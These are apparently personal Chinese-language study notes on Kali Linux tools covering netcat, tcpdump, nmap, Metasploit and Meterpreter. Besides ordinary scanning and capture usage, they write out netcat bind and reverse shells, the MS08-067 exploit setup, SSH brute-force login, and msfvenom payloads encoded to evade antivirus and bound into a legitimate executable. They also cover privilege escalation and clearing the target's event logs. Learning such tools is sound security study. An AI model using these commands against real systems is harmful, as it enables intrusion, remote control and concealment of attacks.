Kali工具使用
NETCAT -NC
nc -nv [ip_add] [port] 连接服务器,n:跟ip地址,不进行dns解析 v:详细内容
传输文本信息:
+ nc -l -p [port] 服务器端 l:侦听
+ nc -nv [ip_add] [port] 客户端进行连接
传输文件/目录:
nc -lp [port] > file.mp4 接收端
nc -nv [ip] [port] < file.mp4 -q 1 发送端
nc -q 1 -lp [port] < file.mp4 发送端
nc -nv [ip] [port] > file.mp4 接收端
tar -cvf - dir/ | nc -lp [port] -q 1 打包发送
nc [ip] [port] | tar -xvf - 接收解包
端口扫描:
nc -nvz -w 1 [ip] [port_range] w:超时设定 z:扫描功能,默认tcp u:udp mode
远程控制:
nc -lp [port] -c bash 服务器端,被控制端 windows电脑bash换为cmd
nc [ip] [port] 客户端,控制端
nc -lp [port] 反向控制(获取shell)
nc -nv [ip] [port] -c bash 被控制端
tcpdump
tcpdump -i wlan0 -s 0 -w file.cap s:size为0时抓取完整包
tcpdump [-A] [-X] -r file.cap 读取包文件,A详细信息,X十六进制显示
tcpdump -i wlan0 tcp port 22 filter
显示过滤:
tcpdump -n -r file.cap | awk '{print $3}' | sort -u n:不进行dns解析,awk文本处理工具,显示第3行,u去除重复项
tcpdump -n src/dst host [ip] -r file.cap 显示指定源地址的包
tcpdump -n tcp port [] -r file.cap 显示指定端口的包
tcpdump -A -n 'tcp[13]=24' -r file.cap 显示过滤第14个字节为24的包,细化到字节过滤
nmap
nmap
-sn [ipadd] ping扫描
-iL [addfile] -sn 调用地址列表文件扫描
-sU [ipadd] UDP端口扫描,原理:icmp目标不可达
-O [ipadd] 操作系统
-sV 服务识别
-sS 半连接扫描,隐蔽
-sT 全连接扫描,建立tcp连接
Modules(概况)
Exploits: 漏洞利用攻击方法,流程
Active exploit 主动攻击,针对服务器,服务存在已知漏洞
Passive exploit 被动攻击,针对客户机,诱使访问制定网站
Payload: 目标机器执行的代码或指令
single:all-in-one
stager 内存有限时输入的较小的payload用于连接
stages 利用stager建立连接下载的后续payload
Auxiliary 辅助模块,没有payload的exploit模块
Encoders 对payload进行加密,躲避病毒软件的查杀
Nops 提高payload稳定性和维持大小
MSF基本使用方法
show [modules] 显示所有可用模块
search [keywords]
name:mysql
path:windows
type:exploit,payload
platform:windows
use exploit/windows/smb/ms08_067_ntapi
info 详细信息
show options
show payloads
show targets
show advanced
show missing 显示未配置选项
set options
setg,unsetg 设置全局变量
RHOST 1.1.1.1
RPORT 445
target [2] 设置目标操作系统,可先是show targets查看,提高结果可靠性
set payload /pay/... 指定payload,可先是show payload查看
LHOST 设定攻击机ip
LPORT
use payload/windows/shell_bind_tcp
generate -o /root/1.exe -k -x /usr/share/windows/radmin.exe -f exe 生成程序置于win下执行,获取shell
check 检测是否可利用,部分exploit没有此功能
run,exploit
save 保存配置
back 返回上一级
数据库相关
db_status
db_rebuild_cache 模块信息映射到数据库,提高相关查询时速度
db_disconnect -h
db_connect
db_nmap 执行nmap命令,保存到数据库
hosts 1.1.1.1
hosts -u 列出状态为up的主机
hosts -S search
service -h 列出所有服务,扫描结果的详细信息
vulns,creds,loot(hashdump)
db_import,export
session -l run -j后台运行后可查看
resource file.rc 原先写好执行脚本,执行命令
载荷Meterpreter
高级payload u盘实现???
+ set payload /meterpreter/.. 获取shell,通过Meterpreter
+ getuid
+ getsystem 获取system权限
+ getpid 查看注入到哪个程序里
+ migrate [pid] 迁移注入进程
+ ls,cd,pwd,cat,ps linux命令可执行
+ run/bgrun [] 可通过-h产看可选项,exp:vnc
+ clearev 清除目标机日志
+ download/upload 下载/上传目标机文件
+ execute -f cmd.exe -i -H i:隐秘执行
+ load python 加载python扩展
MSF–信息收集
主机发现:
use auxiliary/scanner/discovery/arp_sweep
set interface,threads...
端口扫描:
use auxiliary/scanner/portscan/[syn]
set interface,threads...
SNMP扫描:161
use auxiliary/scanner/snmp/snmp_login
snmp_enum
snmp_enumusers (windows)
snmp_enumshares(windows)
SMB扫描:netbios 139,445
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_lookupsid
SSH扫描:23
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
set userpass_file /usr/share/metasploit-framework/ data/wordlists/root_userpass.txt
set verbose false
use auxiliary/scanner/ssh/ssh_login_pubkey 利用已知密钥连接
set KEY_FILE id_rsa
set USERNAME root
sqlserver扫描:
FTP扫描:
MSF–漏洞利用
MSF–客户端攻击
msfvenom --payload-options -p windows/shell/reverse_tcp
LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit